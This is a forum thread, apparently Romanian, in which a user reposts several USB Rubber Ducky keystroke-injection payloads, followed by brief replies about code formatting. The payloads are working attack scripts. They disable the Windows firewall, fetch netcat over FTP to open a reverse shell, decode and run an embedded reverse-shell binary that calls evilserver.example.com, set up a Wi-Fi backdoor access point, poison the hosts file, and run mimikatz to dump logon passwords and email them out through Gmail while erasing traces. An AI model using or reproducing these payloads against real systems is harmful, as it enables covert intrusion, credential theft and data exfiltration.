ponta Posted June 9, 2014 Report Posted June 9, 2014 create an FTP script that logs you in to the FTP server and download netcatdelete the FTP script filerun netcat in daemon moderun cmd.exe one more time to conceal the command we used in the run history.Fill in the required information where you see the brackets.DELAY 10000GUI RDELAY 200STRING cmdENTERDELAY 600STRING cd %USERPROFILE%ENTERDELAY 100STRING netsh firewall set opmode disableENTERDELAY 2000STRING echo open [iP] [PORT] > ftp.txtENTERDELAY 100STRING echo [uSERNAME]>> ftp.txtENTERDELAY 100STRING echo [PASSWORD]>> ftp.txtENTERDELAY 100STRING echo bin >> ftp.txtENTERDELAY 100STRING echo get nc.exe >> ftp.txtENTERDELAY 100STRING echo bye >> ftp.txtENTERDELAY 100STRING ftp -s:ftp.txtENTERSTRING del ftp.txt & exitENTERDELAY 2000GUI RDELAY 200STRING nc.exe [listENER IP] [listENER PORT] -e cmd.exe -dENTERDELAY 2000GUI RDELAY 200STRING cmdENTERDELAY 600STRING exitENTERPayload reverse shell Author: Darren Kitchen with mad props to IllWill dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html Duckencoder: 1.0 Target: Windows 7 Description: Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ascii to binary, creates text file including base64 ascii of binary file to create reverse shell. converts second file to exe with first file. Executes with host and port parameters. Props to go illwill for this payload. See dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.htmlESCAPECONTROL ESCAPEDELAY 400STRING cmdDELAY 400MENUDELAY 400STRING aDELAY 600LEFTARROWENTERDELAY 400STRING copy con c:\decoder.vbsENTERSTRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"):ENTERSTRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64):ENTERSTRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream:ENTERSTRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End SubENTERCTRL zENTERSTRING copy con c:\reverse.txtENTERSTRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAAENTERSTRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAAENTERSTRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAAENTERSTRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENTERSTRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYSENTERSTRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAAENTERSTRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2ENTERSTRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0AENTERSTRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hAENTERSTRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAAENTERSTRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNqENTERSTRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwFENTERSTRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtvENTERSTRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLpENTERSTRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNmENTERSTRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/AENTERSTRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7sENTERSTRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9ENTERSTRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzpENTERSTRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOYENTERSTRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/BENTERSTRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBkENTERSTRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAENTERSTRING AAxAAADpdL7//wAAAAIAAAAMQAAAENTERCTRL zENTERSTRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exeENTERSTRING c:\reverse.exe evilserver.example.com 8080ENTERSTRING exitENTERPayload wifi backdoor Author: Darren Kitchen Duckencoder: 1.0 Target: Windows 7 Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.CONTROL ESCAPEDELAY 200STRING cmdDELAY 200MENUDELAY 100STRING aDELAY 100LEFTARROWENTERDELAY 200STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678ENTERDELAY 100STRING netsh wlan start hostednetworkENTERDELAY 100STRING netsh firewall set opmode disableENTERSTRING exitENTERPayload local dns poisoningThe following is a local DNS poisoning attack that changes a hosts host file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.REM Author:ashbreeze96 and overwraithGUI RSTRING cmd /Q /D /T:7F /F:OFF /V:ON /KDELAY 500ENTERDELAY 750ALT SPACESTRING MDOWNARROWREPEAT 100ENTERDELAY 50STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTSDELAY 50ENTERDELAY 50STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTSDELAY 50ENTERSTRING exitENTERPayload download mimikatz, grab passwords and email them via gmail This payload:1. Downloads appropriate mimikatz version via http (I used dropbox)2. Opens a admin prompt3. saves mimikatz log to file4. emails log via gmailplease change these lines to something (keep the single quote):'url to 32bit mimikatz.exe''url to 64bit mimikatz.exe''gmailuser', 'gmail password''sending email account''email account to send report'Sorry about the wacky delays!REM Author: PesceREM Date: 10/20/2013REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset!REM -------------open command prompt with admin privilegesDELAY 3000CONTROL ESCAPEDELAY 1000STRING cmdDELAY 1000CTRL-SHIFT ENTERDELAY 1000ALT yENTERDELAY 300REM -------------download appropriate mimikatz for architectureSTRING powershell if ([system.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');}ENTERDELAY 5000REM -------------get the passwords and save to c:\pwlog.txtSTRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;ENTERDELAY 2000STRING privilege::debugENTERDELAY 1000STRING sekurlsa::logonPasswords fullENTERDELAY 1000STRING exitENTERDELAY 300STRING del %TEMP%\pw.exeENTERDELAY 300REM -------------email log via gmailSTRING powershellENTERDELAY 300STRING $SMTPServer = 'smtp.gmail.com'ENTERSTRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)ENTERSTRING $SMTPInfo.EnableSsl = $trueENTERSTRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password');ENTERSTRING $ReportEmail = New-Object System.Net.Mail.MailMessageENTERSTRING $ReportEmail.From = 'sending email account'ENTERSTRING $ReportEmail.To.Add('email account to send report')ENTERSTRING $ReportEmail.Subject = 'Duck Report'ENTERSTRING $ReportEmail.Body = 'Attached is your duck report.' ENTERSTRING $ReportEmail.Attachments.Add('c:\pwlog.txt')ENTERSTRING $SMTPInfo.Send($ReportEmail)ENTERDELAY 1000STRING exitENTERREM ---------------------delete and endSTRING del c:\pwlog.txtENTERDELAY 300STRING exitENTERSursa : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads Quote
Ganav Posted June 9, 2014 Report Posted June 9, 2014 Foloseste, te rog, etichetele code. De exemplu:<batch_script> Quote
ponta Posted June 9, 2014 Author Report Posted June 9, 2014 Ok cunt incepator invat incet incet.Foloseste, te rog, etichetele code. De exemplu:<batch_script> Quote